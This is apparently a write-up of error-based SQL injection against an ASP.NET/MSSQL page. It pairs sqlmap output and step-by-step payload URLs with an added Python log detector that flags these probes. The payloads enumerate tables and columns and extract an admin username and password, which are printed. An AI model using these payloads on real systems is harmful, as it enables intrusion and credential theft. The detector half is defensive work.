sqlmap output:

```
---
Parameter: ProductID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ProductID=2' AND 1913=1913 AND 'GquC'='GquC

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause(IN)
    Payload: ProductID=2' AND 1360 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1360=1360) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(113))) AND 'JOdp'='JOdp
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008
```
```
1. http://B.com/AutoMain.aspx?ProductID=1' and db_name()>0--
```

Database name returned in the error: b.com_db
Querying the current data information:

```
1. http://B.com/AutoMain.aspx?ProductID=1' having 1=1--
```

Returned in the error: Product.ProductID
Pitfalls:

A subquery cannot return more than one row, and MSSQL does not support LIMIT the way MySQL does; the workaround is given below.
Getting table names:

```
1. http://B.com/AutoMain.aspx?ProductID=1' and 1=(select top 1 name from sysobjects where xtype='u' and name !='info');--
2. http://B.com/AutoMain.aspx?ProductID=1' and 1=(select top 1 table_name from information_schema.tables);--
```

This method can query any user table:

```
http://B.com/AutoMain.aspx?ProductID=1' and (select top 1 name from (select top 1 id,name from sysobjects where xtype=char(85)) T order by id desc) > 1--
```

User table obtained: AdminLogin
Getting column names:

```
1. http://B.com/AutoMain.aspx?ProductID=1' and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'AdminLogin') and name<>'id');--
2. http://B.com/AutoMain.aspx?ProductID=1' and 1=(select top 1 column_name from information_schema.columns);--
```

This method can query any column of the AdminLogin table:

```
3. http://B.com/AutoMain.aspx?ProductID=1' and (select top 1 col_name(object_id('AdminLogin'),1) from sysobjects) > 1--
```

Column names of the user table obtained: AdminID, UserName, Password
Getting the data:

```
1. http://B.com/AutoMain.aspx?ProductID=1' and (select top 1 UserName from AdminLogin where AdminID=1) > 1--
2. http://B.com/AutoMain.aspx?ProductID=1' and (select top 1 Password from AdminLogin where AdminID=1) > 1--
```

Account and password obtained: admin / islamabad
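From the defender's side, the catalog probes used throughout this writeup (sysobjects, syscolumns, information_schema, HAVING 1=1, col_name/object_id) stand out in IIS W3C logs. The detector below is an added example, not part of the original post; the log lines are constructed, and the field order assumed is the IIS default (date time s-ip cs-method cs-uri-stem cs-uri-query ...).

```python
# Added detector: flags requests carrying the MSSQL metadata probes shown in this writeup.
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# Indicator regexes derived from the injection strings quoted above.
INDICATORS = {
    "mssql_catalog_view": re.compile(r"\b(sysobjects|syscolumns|information_schema\.\w+)\b"),
    "object_resolution": re.compile(r"\b(col_name|object_id|db_name)\s*\("),
    "having_error_probe": re.compile(r"\bhaving\s+1\s*=\s*1\b"),
    "row_pick_top1": re.compile(r"\bselect\s+top\s+\d+\b"),
    "quote_breakout": re.compile(r"'\s*(and|or|having)\b"),
    "comment_terminator": re.compile(r"--\s*$"),
}

def normalise_query(cs_uri_query: str) -> str:
    """URL-decode twice (catches double-encoding), lower-case, collapse whitespace."""
    decoded = unquote_plus(unquote_plus(cs_uri_query))
    return re.sub(r"\s+", " ", decoded).strip().lower()

def classify_query(cs_uri_query: str) -> List[str]:
    """Return the names of all indicators present in one cs-uri-query value."""
    q = normalise_query(cs_uri_query)
    return [name for name, rx in INDICATORS.items() if rx.search(q)]

def scan_iis_log(lines) -> List[Tuple[str, str, List[str]]]:
    """Return (cs-uri-stem, cs-uri-query, indicators) for each flagged W3C line.
    Assumes the default IIS field order: date time s-ip cs-method cs-uri-stem cs-uri-query ...
    """
    hits = []
    for line in lines:
        if not line or line.startswith("#"):
            continue  # skip blanks and W3C directive lines
        fields = line.split(" ")
        if len(fields) < 6 or fields[5] == "-":
            continue  # malformed line or no query string
        found = classify_query(fields[5])
        # Require two indicators so a lone "--" typed into a search box is not flagged.
        if len(found) >= 2:
            hits.append((fields[4], fields[5], found))
    return hits

# Constructed sample log lines (not from the original page); query strings are URL-encoded as IIS logs them.
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip",
    "2015-01-01 10:00:00 10.0.0.5 GET /AutoMain.aspx ProductID=1 80 198.51.100.7",
    "2015-01-01 10:00:01 10.0.0.5 GET /AutoMain.aspx ProductID=1'+having+1%3D1-- 80 198.51.100.7",
    "2015-01-01 10:00:02 10.0.0.5 GET /AutoMain.aspx ProductID=1'+and+1%3D(select+top+1+name+from+sysobjects+where+xtype%3D'u')-- 80 198.51.100.7",
    "2015-01-01 10:00:03 10.0.0.5 GET /Search.aspx q=top+10+products+-- 80 198.51.100.9",
]
```

Running `scan_iis_log(SAMPLE_LOG)` flags only the two AutoMain.aspx probe lines; the search request with a trailing `--` scores a single indicator and is left alone.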